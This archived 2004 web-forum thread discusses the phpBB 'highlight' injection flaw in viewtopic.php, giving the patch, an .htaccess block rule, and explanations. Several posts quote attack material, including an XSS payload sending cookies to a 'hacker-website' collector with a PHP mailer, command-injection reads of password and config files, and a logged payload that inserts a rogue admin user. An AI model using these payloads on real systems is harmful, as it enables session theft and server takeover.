Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1159
Location: Sanbornton, NH USA

PostPosted: Fri Nov 19, 2004 6:22 pm Reply with quote

Hi Folks

Just as a heads-up until Chatserv comes out with a new permanent update with a new port to phpBB 2.0.11, please be aware of the following.

There is a serious security exploit regarding the "highlight" function in phpBB.

Last month, I filled out a bug report and that got followed up by several other users also filling in other problems relative to the highlight function after I first discovering several problems here and at Only registered users can see links on this board! Get registered or login!

See: Only registered users can see links on this board! Get registered or login!

As it turns out, one of those "other" problems was also a serious security exploit... While I won't go into the nasty situation that happened after that, (which is what got the folks over at phpBB to get off their butts and fix it).....I will say:

All users are URGED to IMMEDIATELY see the following report from phpBB and make the change!
Only registered users can see links on this board! Get registered or login!

The affected file is /modules/Forums/viewtopic.php


Just a heads-up!

_________________
Steph Benoit Only registered users can see links on this board! Get registered or login!
1CMS, 100% Section 508 and W3C XHTML/CSS Compliant (Truly) 
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri Nov 19, 2004 7:00 pm Reply with quote

Thanks so much for this alert! If you were one of my customers I would reward you hostwise, but alas, I can't.
 
View user's profile Send private message
sixonetonoffun
Spouse Contemplates Divorce


Joined: Jan 02, 2003
Posts: 2496

PostPosted: Fri Nov 19, 2004 8:36 pm Reply with quote

Can someone enlighten me as to why urldecode() being removed is a patch for this problem?

_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 
View user's profile Send private message
Raven
PostPosted: Fri Nov 19, 2004 8:37 pm Reply with quote

I asked 64bit also but haven't heard back.
 
Raven
PostPosted: Fri Nov 19, 2004 8:40 pm Reply with quote

Is it just me or do the links in your email notification no longer work?

Typical windblows. Reboot and all is well.


Last edited by Raven on Fri Nov 19, 2004 9:35 pm; edited 1 time in total 
64bitguy
PostPosted: Fri Nov 19, 2004 8:53 pm Reply with quote

Mine are working, but since updating to Firefox 1.0, they don't open in a new window but rather the one I'm working it... Which really slowed down the PM I just sent you...

lol

I'm off to find a solution for that now.

Anyway.. RE this problem. It should be noted that some are telling me that this is not a fix to the problems, but rather a patch to protect users. The fix is being worked on and will be released as part of 2.0.12.

I've given what little information remains about this incident to Raven. Most of the forum posts at phpBB regarding this issue have been deleted by the staff.

Anyway... I'll be back after StarGate. (What can I say, Priorities). Smile
 
southern
Client


Joined: Jan 29, 2004
Posts: 591
Location: Texas

PostPosted: Fri Nov 19, 2004 9:04 pm Reply with quote

Frankly I see little difference between the break and the fix
Code:


Open viewtopic.php in any text editor. Find the following section of code:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

   for($i = 0; $i < sizeof($words); $i++)
   {
 

and replace with:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

   for($i = 0; $i < sizeof($words); $i++)
   {
 

Please inform as many people as possible about this issue. If you're a hosting provider please inform your customers if possible. Else we advise you implement some level of additional security if you run ensim or have PHP running cgi under suexec, etc.

except for the urldecode thing and number of )s reduced from 4 to 3. What possible significance could that have in terms of security?
 
View user's profile Send private message Visit poster's website MSN Messenger ICQ Number
JRSweets
Worker
Worker


Joined: Aug 06, 2004
Posts: 192

PostPosted: Sat Nov 20, 2004 2:02 pm Reply with quote

Only registered users can see links on this board! Get registered or login!

That link has a little better explanation.
 
View user's profile Send private message
64bitguy
PostPosted: Sat Nov 20, 2004 2:12 pm Reply with quote

I did not include that link as it doesn't really explain the problem, but rather some of the hostilities that took place after it.

In fact this thread is pretty hostile itself (though it doesn't hold a candle to the other ones). As I said in my original post, there was a rather nasty situation that occurred following identification of the problems. Those threads have been deleted by phpbb admin personnel. I suspect this one will be as well.

All in all, things are pretty sensitive over at phpbb.com right now. I would suggest that users stay as far removed from this situation as possible to avoid any backlash (or tonguelashings) that has been experienced by others.

I've found even asking specific questions about the exploit have been greeted by .... what I would define as "a defensive posture" on the part of phpbb folks, so again, I wouldn't post anything unless you are ready to deal with that. I would especially advise that nobody post anything else to the above listed thread as again, some people seem to be still reeling from how this situation arose and was dealt with.

Just my two cents.

As a heads-up, my host got hacked via this exploit about 6 hours after I posted a notice on their site. I guess they didn't think it was as important as I advised. Oh well..... Some people never listen.
 
Raven
PostPosted: Sat Nov 20, 2004 2:18 pm Reply with quote

I have learned, as a general rule, if someone tells me to do this or that because they have first hand knowledge, I usually will do it, especially in matters of security. In this case I still don't understand the exploit and even less how that change stops it. But, better safe than sorry, that's for sure. Thanks once again.
 
sixonetonoffun
PostPosted: Sat Nov 20, 2004 2:38 pm Reply with quote

Funny stuff there! PHPBB is almost as bad as FB when it comes to their reputation with handling reported issues. I don't condone the lamer tactics used to secure credit for finding the bug but it was really not much to ask for IMO. Its not like they tried to extort money for pete's sake.
 
64bitguy
PostPosted: Sat Nov 20, 2004 3:11 pm Reply with quote

There are actually several bugs that are related to injection vulnerabilities... This one is the easiest, and thus this is why this warning is urgent.

Here's the breakdown.... I'm being careful not to say too much because this hole exists in many places, and I don't want the script kiddies to feel like they are being invited to attack anyone.

The bottom line is that "urldecode" (and magic quotes) changes %2527 into %27 (a single quote) and leaves the converted data unslashed.

In a nutshell, this function being where it is, is creating a SQL Injection vulnerability via that function.

In this case, the function is useless where it is, so it was removed as all it is doing is creating this hole in the code.

The preg_replace('#\b(')\b#i', '\1' function cannot do it's thing because by highlighting any topic with %2527, you are leaving the hole open with a single quote (%27).

Removing the decode makes it so that this function doesn't covert the highlighted variable and leaves it unaltered so that injection can't occur as it would be caught by line 1183 and generate an error.

Now, as an example, let's say that the %2527 query was followed by UNION, adminusername, adminpassword, xxx. This is where the real problem lies. You've basically bypassed all of the security in place by injecting a new query using highlight. Not a good thing.

It gets worse when you think about using viewtopic.php for XSS query.

For example, first lets say that they want your cookie.
Only registered users can see links on this board! Get registered or login!
Here, you could steal cookies by using:
&lt;script&gt;document.location='http://hacker-website/cookies.php?'+document.cookie&lt;/script&gt;
and in Only registered users can see links on this board! Get registered or login!

On that site, they would have a PHP file with something like:
mail("me at wherever dot com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send it with a variable name

Needless to say, these are problems. Some of this comes back to: Only registered users can see links on this board! Get registered or login!

Anyway... What I found interesting (and god, don't ask me how since all of that data got dumped when I upgrade NukeSentinel to 2.1.1) was the first time I set this up as a test bed, NukeSentinel caught the UNION injection attempted. It did not pickup on the XSS exploit (I suspect because of how it is being done).

Anyway. I hope this helps explain what is going on.

P.S. If I'm saying too much, Raven.. please feel free to edit or destroy this message.

Thanks
 
sixonetonoffun
PostPosted: Sun Nov 21, 2004 9:15 am Reply with quote

Thanks Steph I assumed it was something being passed encoded I didn't know the issue with urldecode was because of how it decoded the quotes. I run a hacked version of the scripting filters I but I haven't been able to pass code with either <scr+pt or &lt;scr+pt even through the default ones.
 
frankie_33
New Member
New Member


Joined: Dec 05, 2004
Posts: 1

PostPosted: Sun Dec 05, 2004 7:06 pm Reply with quote

64bitguy wrote:
There are actually several bugs that are related to injection vulnerabilities... This one is the easiest, and thus this is why this warning is urgent.

Here's the breakdown.... I'm being careful not to say too much because this hole exists in many places, and I don't want the script kiddies to feel like they are being invited to attack anyone.

The bottom line is that "urldecode" (and magic quotes) changes %2527 into %27 (a single quote) and leaves the converted data unslashed.

In a nutshell, this function being where it is, is creating a SQL Injection vulnerability via that function.

In this case, the function is useless where it is, so it was removed as all it is doing is creating this hole in the code.

The preg_replace('#\b(')\b#i', '\1' function cannot do it's thing because by highlighting any topic with %2527, you are leaving the hole open with a single quote (%27).

Removing the decode makes it so that this function doesn't covert the highlighted variable and leaves it unaltered so that injection can't occur as it would be caught by line 1183 and generate an error.

Now, as an example, let's say that the %2527 query was followed by UNION, adminusername, adminpassword, xxx. This is where the real problem lies. You've basically bypassed all of the security in place by injecting a new query using highlight. Not a good thing.

It gets worse when you think about using viewtopic.php for XSS query.

For example, first lets say that they want your cookie.
Only registered users can see links on this board! Get registered or login!
Here, you could steal cookies by using:
&lt;script&gt;document.location='http://hacker-website/cookies.php?'+document.cookie&lt;/script&gt;
and in Only registered users can see links on this board! Get registered or login!

On that site, they would have a PHP file with something like:
mail("me at wherever dot com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send it with a variable name



you are joking right?
XSS is the very least of the problems with this exploit!
why would anyone even bother with a XSS attempt when the true
danger of this exploit lies in the fact that the unescaped %2527 chr
results in injecting a system $cmd.
I.E 'cat ../.passwd' on a shared host
or how about 'cat config.php'
now that is the REAL danger !

so if anyone is running a version < 2.0.11
update without a delay!

admins should aslo disable viewtopic.php if not updated.

c-ya

Quote:

Needless to say, these are problems. Some of this comes back to: Only registered users can see links on this board! Get registered or login!

Anyway... What I found interesting (and god, don't ask me how since all of that data got dumped when I upgrade NukeSentinel to 2.1.1) was the first time I set this up as a test bed, NukeSentinel caught the UNION injection attempted. It did not pickup on the XSS exploit (I suspect because of how it is being done).

Anyway. I hope this helps explain what is going on.

P.S. If I'm saying too much, Raven.. please feel free to edit or destroy this message.

Thanks
[/b]
 
View user's profile Send private message
blarneystone
Client


Joined: Sep 18, 2004
Posts: 62

PostPosted: Tue Dec 21, 2004 8:58 pm Reply with quote

Is this the same as the PHPBB Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message Visit poster's website
hdonalds
New Member
New Member


Joined: Dec 18, 2004
Posts: 5

PostPosted: Wed Dec 22, 2004 9:26 am Reply with quote

hi everyone, this is probably pretty basic...
I am seeing variations of this entry in my logs:
GET /viewtopic.php t=1144&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)......

After doing a little searching i found this was a sql injection attempt.
I have recently upgraded to the latest version of PHP 4x.

How can i block this type of stuff with Sentinel??

Thnaks in advance!!
 
View user's profile Send private message
Raven
PostPosted: Wed Dec 22, 2004 9:36 am Reply with quote

The entire string resolves to

INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','lock','ba3c83348bddf7b368b478ac06d3340e','1')

We're looking into it and will report back.
 
chatserv
Member Emeritus


Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

PostPosted: Wed Dec 22, 2004 11:03 am Reply with quote

sixonetonoffun wrote:
Funny stuff there! PHPBB is almost as bad as FB when it comes to their reputation with handling reported issues. I don't condone the lamer tactics used to secure credit for finding the bug but it was really not much to ask for IMO. Its not like they tried to extort money for pete's sake.

I'd go as far as saying it is worse, much lile PostNuke they don't like using code implemented by non members
 
View user's profile Send private message Visit poster's website
BohrMe
Hangin' Around


Joined: May 01, 2004
Posts: 28
Location: Fall River, MA

PostPosted: Wed Dec 22, 2004 11:21 am Reply with quote

This was also offered up on the phpBB site as a band-aid until an upgrade of the forum software can be made.

Add this to your .htaccess:
Code:
RewriteEngine on


RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$ - [F,L]

_________________
BohrMe
eSnider.net 
View user's profile Send private message Visit poster's website
BobMarion
Former Admin in Good Standing


Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

PostPosted: Wed Dec 22, 2004 1:56 pm Reply with quote

Believe it or not NukeSentinel(tm) already blocks that attempt as a "Script" attack. I'm getting 10 to 15 of them a day on my site and they are getting blocked Smile

_________________
Bob Marion
Codito Ergo Sum
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Send e-mail Visit poster's website
Raven
PostPosted: Wed Dec 22, 2004 2:13 pm Reply with quote

I thought is was but I wanted it confirmed Wink
 
chatserv
PostPosted: Wed Dec 22, 2004 2:21 pm Reply with quote

BobMarion wrote:
Believe it or not NukeSentinel(tm) already blocks that attempt as a "Script" attack. I'm getting 10 to 15 of them a day on my site and they are getting blocked Smile

might be a good idea to expand the filter check to work with the Forums and their related modules.
 
Muffin
Client


Joined: Apr 10, 2004
Posts: 649
Location: UK

PostPosted: Sat Dec 25, 2004 5:07 pm Reply with quote

Has this been implemented in Chat's latest patched series please?

_________________
Classic Mini rules the bends & bends the rules!
[img] 
View user's profile Send private message
chatserv
PostPosted: Tue Dec 28, 2004 11:05 am Reply with quote

The patch already had the script block
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©